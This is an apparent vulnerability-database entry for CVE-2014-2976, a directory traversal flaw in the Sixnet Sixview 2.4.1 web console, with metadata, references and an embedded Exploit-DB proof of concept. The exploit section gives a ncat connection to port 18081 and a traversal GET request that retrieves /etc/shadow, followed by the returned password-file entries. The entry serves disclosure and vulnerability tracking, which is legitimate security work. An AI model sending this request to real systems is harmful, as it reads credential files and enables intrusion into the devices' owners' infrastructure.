Sign-up

ID

VAR-E-201404-0060


CVE

cve_id:CVE-2014-2976

Trust: 2.1

sources: PACKETSTORM: 126267 // EXPLOIT-DB: 32973 // EDBNET: 54472

EDB ID

32973


TITLE

Sixnet Sixview 2.4.1 - Web Console Directory Traversal - Hardware webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 32973

DESCRIPTION

Sixnet Sixview 2.4.1 - Web Console Directory Traversal. CVE-2014-2976CVE-106149 . webapps exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 32973

AFFECTED PRODUCTS

vendor:sixnetmodel:sixviewscope:eqversion:2.4.1

Trust: 2.1

sources: PACKETSTORM: 126267 // EXPLOIT-DB: 32973 // EDBNET: 54472

EXPLOIT

#Exploit Title: Sixnet sixview web console directory traversal
#Date: 2014-04-21
#Exploit Author: daniel svartman
#Vendor Homepage: www.sixnet.com
#Software Link: Not available, hardware piece - appliance
#Version: 2.4.1
#Tested on: Sixnet Sixview web console (Linux based appliance)
#CVE : 2014-2976

PoV, Sixnet sixview web console handle requests through HTTP on port 18081.
These requests can be received either through GET or POST requests.
I discovered that GET requests are not validated at the server side,
allowing an attacker to request arbitrary files from the supporting OS.

Below is an example of the affected URL and the received answer using
netcat:

ncat <HOSTNAME> 18081
GET /../../../../../../../../../../etc/shadow HTTP/1.1

HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Type: text/html
Keep-Alive: timeout=15, max=50
Date: <SNIP>
Last-Modified: <SNIP>
Content-Length: 1025

root:<REMOVED>:15655:0:99999:7:::
bin:*:15513:0:99999:7:::
daemon:*:15513:0:99999:7:::
adm:*:15513:0:99999:7:::
lp:*:15513:0:99999:7:::
sync:*:15513:0:99999:7:::
shutdown:*:15513:0:99999:7:::
halt:*:15513:0:99999:7:::
mail:*:15513:0:99999:7:::
uucp:*:15513:0:99999:7:::
<SNIP>

Trust: 1.0

sources: EXPLOIT-DB: 32973

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 32973

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 32973

TYPE

Web Console Directory Traversal

Trust: 1.6

sources: EXPLOIT-DB: 32973 // EDBNET: 54472

TAGS

tag:exploit

Trust: 0.5

tag:file inclusion

Trust: 0.5

sources: PACKETSTORM: 126267

CREDITS

daniel svartman

Trust: 0.6

sources: EXPLOIT-DB: 32973

EXTERNAL IDS

db:NVDid:CVE-2014-2976

Trust: 2.1

db:EXPLOIT-DBid:32973

Trust: 1.6

db:EDBNETid:54472

Trust: 0.6

db:PACKETSTORMid:126267

Trust: 0.5

sources: PACKETSTORM: 126267 // EXPLOIT-DB: 32973 // EDBNET: 54472

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2014-2976

Trust: 2.1

url:https://www.exploit-db.com/exploits/32973/

Trust: 0.6

sources: PACKETSTORM: 126267 // EXPLOIT-DB: 32973 // EDBNET: 54472

SOURCES

db:PACKETSTORMid:126267
db:EXPLOIT-DBid:32973
db:EDBNETid:54472

LAST UPDATE DATE

2022-07-27T09:24:42.308000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:126267date:2014-04-22T22:22:22
db:EXPLOIT-DBid:32973date:2014-04-22T00:00:00
db:EDBNETid:54472date:2014-04-22T00:00:00